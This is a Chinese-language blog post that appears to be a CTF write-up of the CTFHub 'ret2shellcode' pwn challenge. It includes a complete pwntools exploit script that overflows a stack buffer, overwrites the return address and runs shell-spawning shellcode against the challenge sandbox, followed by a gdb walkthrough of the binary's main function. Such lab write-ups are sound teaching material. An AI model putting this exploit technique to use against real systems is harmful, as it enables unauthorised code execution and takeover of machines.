CTFHUB-PWN-ret2shellcode

已于 2023-04-19 17:47:08 修改
阅读量911 收藏 7
点赞数 1
分类专栏: PWN的学习 文章标签: 开发语言
于 2023-04-16 14:59:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/130181350
版权

PWN常用命令_猫疼玩AI的博客-CSDN博客

1.做题方法

几个大方向的思路:
没有PIE:ret2libc
NX关闭:ret2shellcode
其他思路:ret2csu、ret2text 【程序本身有shellcode

先检查开了什么保护

没有开保护 并且是64 的

放入ida64

查看字符串

 发现没有shell

我们看看主函数

 发现有read函数 但是没有shell

并且 read 的大小为 400u   但是我们buf的大小只为 10h 所以说明是让我们写shellcode进去

我们现在要确定一些信息

1.buf的大小

大小为 0x10+0x08  因为是64位

2.shellcode的地址

我们要知道shellcode的地址 必须要知道 buf的地址 因为我们要把buf填充满 然后再让栈进入shellcode的地址 然后再执行shellcode

我们把shellcode_addr放在 buf_addr后面

buf_addr 是在程序执行的时候给我们的 %p是输出地址

所以我们使用pwntools 的 recvuntil()函数来取得

3.shellcode

使用pwntools中的

shellcode = asm(shellcraft.sh())即可

但是注意 64位要加上 context.arch='amd64'

context.arch = 'amd64'
shellcode = asm(shellcraft.sh())

我们取得这些 我们就可以开始编写 exp

from pwn import *
import re
context.arch='amd64'
shellcode=asm(shellcraft.sh())
p=remote('challenge-c3b38bfcad408f15.sandbox.ctfhub.com',33975)
buf_addr=p.recvuntil(']')  #截取到]为止的字符串
buf_addr=int(buf_addr[-15:-1],16)  #处理一下 然后为16进制
shellcode_addr=buf_addr+32   #0x10+0x08+0x08 十进制为32
payload=b'a'*(0x10+0x08)+p64(shellcode_addr)+shellcode
p.sendline(payload)
p.interactive()

运行

 得到flag

最后晒出我自己理解的栈中的现象

2.开始解读栈内的方法 就是看gdb

► 0x40060b <main+4>     sub    rsp, 0x10   #减法rsp-0x10 就是开辟空间
   0x40060f <main+8>     mov    qword ptr [rbp - 0x10], 0
把0 作为数值存入 rbp:0x10的地址
   0x400617 <main+16>    mov    qword ptr [rbp - 8], 0
把0 作为数值存入 rbp:8的地址
   0x40061f <main+24>    mov    rax, qword ptr [rip + 0x200a22] 
<stdout@@GLIBC_2.2.5>
把qword ptr [rip + 0x200a22]的地址存入rax寄存器中 
   0x400626 <main+31>    mov    ecx, 0
把0作为参数存入ecx 这里是作为 下面setvbuf的第二个参数
   0x40062b <main+36>    mov    edx, 1
同理
   0x400630 <main+41>    mov    esi, 0
同理
   0x400635 <main+46>    mov    rdi, rax
然后把rax存入rdi 就是上面的stdout流
   0x400638 <main+49>    call   setvbuf@plt                      <setvbuf@plt>
调用setvbuf函数
 
   0x40063d <main+54>    lea    rdi, [rip + 0xd4]
开始调用[rip + 0xd4]的地址指针存入rdi 作为puts的参数
   0x400644 <main+61>    call   puts@plt  
开始调用puts函数
 0x400649 <main+66>     lea    rax, [rbp - 0x10]
开始把[rbp:0x10]的地址指针存入rax
   0x40064d <main+70>     mov    rsi, rax
把rax的值存入rsi寄存器 作为下面print函数的参数
   0x400650 <main+73>     lea    rdi, [rip + 0xe2]
把[rip+0xe2]的指针存入rdi 这里是字符串常量的地址
   0x400657 <main+80>     mov    eax, 0
将eax调为0 表示没有浮点数
   0x40065c <main+85>     call   printf@plt                      <printf@plt>
 开始调用printf函数

 ► 0x400661 <main+90>     lea    rdi, [rip + 0xe6]
把[rip:0xe6]的地址存入rdi寄存器 作为puts函数的参数 也是字符串
   0x400668 <main+97>     call   puts@plt                      <puts@plt>
调用puts函数
   0x40066d <main+102>    lea    rax, [rbp - 0x10]
把[rbp-0x10]的地址存入rax寄存器 这里是取得 这个地址的东西
   0x400671 <main+106>    mov    edx, 0x400
然后把400h存入edx 表示打印可以输出的最大字节
   0x400676 <main+111>    mov    rsi, rax
把rax存入rsi寄存器 就是作为参数
   0x400679 <main+114>    mov    edi, 0
把edi设置为0 作为参数 
 0x40067e       <main+119>                      call   read@plt                      <read@plt>
执行 read函数
 
   0x400683       <main+124>                      mov    eax, 0
把0作为参数存入eax
   0x400688       <main+129>                      leave  
退出
   0x400689       <main+130>                      ret    
返回到返回地址
    ↓
   0x7ffff7c29d90 <__libc_start_call_main+128>    mov    edi, eax
把eax存入edi
 ► 0x7ffff7c29d92 <__libc_start_call_main+130>    call   exit                <exit>
        status: 0x0
 调用exit函数 退出到主函数
   0x7ffff7c29d97 <__libc_start_call_main+135>    call   __nptl_deallocate_tsd                <__nptl_deallocate_tsd>
调用这个函数
 
   0x7ffff7c29d9c <__libc_start_call_main+140>    lock dec dword ptr [rip + 0x1ef505]  <__nptl_nthreads>
   0x7ffff7c29da3 <__libc_start_call_main+147>    sete   al
   0x7ffff7c29da6 <__libc_start_call_main+150>    test   al, al
   0x7ffff7c29da8 <__libc_start_call_main+152>    jne    __libc_start_call_main+168                <__libc_start_call_main+168>

到此解释完毕

执行函数前 先要调用寄存器 把函数的参数存入寄存器中 作为后面函数的参数

双层小牛堡
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 795
CTF-wiki的注解:ret2shellcode
PWN ret2shellcode
prettyX的博客
11-22 1963
今天天气阴,来做一下ret2shellcode。 记录一下。 : ) 0X00 ret2shellcode原理 ret2shellcode,就是,return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcodeshellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。 ret2shellcode...
ctfhubret2shellcode
m0_75234353的博客
04-02 391
要把shellcode写入返回地址之后,所以shellcode地址为16+8+8=32。还要再覆盖上父函数的栈底的指针信息,因为是64架构,所以有8字节。发现stack的权限有rwx,本题的攻破点就在栈上了。由图可得:buf距rbp 0x10,也就是16个字节。连接成功,即可得flag。
CTFhub-pwn-[ret2shellcode]
m0_43405474的博客
08-26 1414
CTFpwn的一个关于ret2shellcode的小练习,来自CTFhub
CTF-PWN-栈溢出-基本ROP-【ret2shellcode
llovewuzhengzi的博客
11-16 156
C 库函数 int atoi(const char *str) 把参数 str 所指向的字符串转换为一个整数(类型为 int 型)。栈溢出,同时栈上可执行,利用泄露的buf地址作为返回地址,同时将shellcode写入buf。这里read存在栈溢出,同时第一个fprintf输出了buf的地址。Has RWX segments提示有可读可写可执行的段。接受字节‘0x ……’的处理,先化整型然后p64处理。shellcode一个不行就换下一个。控制程序去执行我们自己填充的代码。
pwn基础之ctfwiki-栈溢出-基础ROP-ret2shellcode
qq_52658640的博客
04-22 1196
文章目录前言原理ret2shellcode挖掘漏洞利用漏洞利用脚本(exp)总结 前言 二进制小白的学习记录,是自己写的第二篇文章,相较于第一篇文章我也做了一些改进,希望会越来越好。也希望二进制大佬们及时斧正文章的错误。 原理 ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执
ret2shellcode
qq_45691294的博客
12-18 4677
shellcode的含义: 在栈溢出的攻击技术中通常是要控制函数的返回地址到自己想要的地方执行自己想要执行的代码。ret2shellcode代表返回到shellcode中即控制函数的返回地址到预先设定好的shellcode区域中去执行shellcode代码,这是非常危险的。 这里学习一下shellcode的利用方式,用ret2shellcode作为例题 先用checksec查看一下保护,可以看到,没有开启任何保护机制,且是一个32位的程序 使用IDA分析程序,只发现了主函数,并没有发现后门函数 get
ctfhub 技能树pwn 栈溢出 ret2text
m0_75234353的博客
03-29 643
看到v4这个变量的缓冲区,我们要把数据溢出到覆盖返回地址,即0x70+8。选中该行,看到下方的地址(4007B8)看到gets危险函数,再点开其中的v4。再shift+f12 直接查看相关字符。可以看到无任何的栈保护。输入:wq 保存退出。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CTF-PWN-callme32 [ROP+栈溢出]
SuperGate的博客
08-13 916
首先发现在pwnme函数中有一个明显的缓冲区溢出,长度为40,经调试发现填入44长度的垃圾信息即可填入shellcode ida发现一个重要函数如下: 点入后发现这三个函数为系统级调用。正好题目给了我们一个.so文件。进入查看,发现有这三个函数的反编译。依次是将加密后的flag通过key1,key2解密。调用顺序应该是callme_one -> callme_two -> c...
CTFHUB-WriteUp】pwn技能树-栈溢出-Ret2VDSO
qq_39933891的博客
03-11 944
ops
CTFhub pwn
清霂的博客
02-04 1260
这里写目录标题1.ret2text2.ret2shellcode 1.ret2text file checksec ida64 gets函数有栈溢出漏洞,题目为ret2text即返回到text段得到shell shift+f12打开字符串窗口,找到/bin/sh 点进去,选中/bin/sh,右键,交叉引用列表(可以找到使用/bin/sh的地方) 看到把/bin/sh放入rdi后,调用了system x64,64位系统中rdi,rsi,rdx,rcx,r8,r9作为调用函数的前6个参数,如果参数多于6
CTFHub技能树-----pwn off by null
saulgoodman的博客
02-03 254
【代码】CTFHub技能树-----pwn off by null。
Java进阶篇之接口的概念与应用
最新发布
code2cat的博客
08-14 1463
接口在Java中是一个非常重要的设计工具,能够帮助开发者定义行为规范、实现代码的解耦与模块化。在实际项目中,接口的应用不仅限于设计模式,还广泛应用于服务层与数据层的解耦、模块化设计、与第三方库的集成等场景。掌握接口的使用技巧,将极大地提高你编写高质量、可维护代码的能力。关键点回顾接口的定义:使用interface关键字定义接口,接口中可以包含抽象方法、默认方法和静态方法。接口的实现:类通过implements关键字实现一个或多个接口,并提供接口中所有抽象方法的实现。接口的应用场景。
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值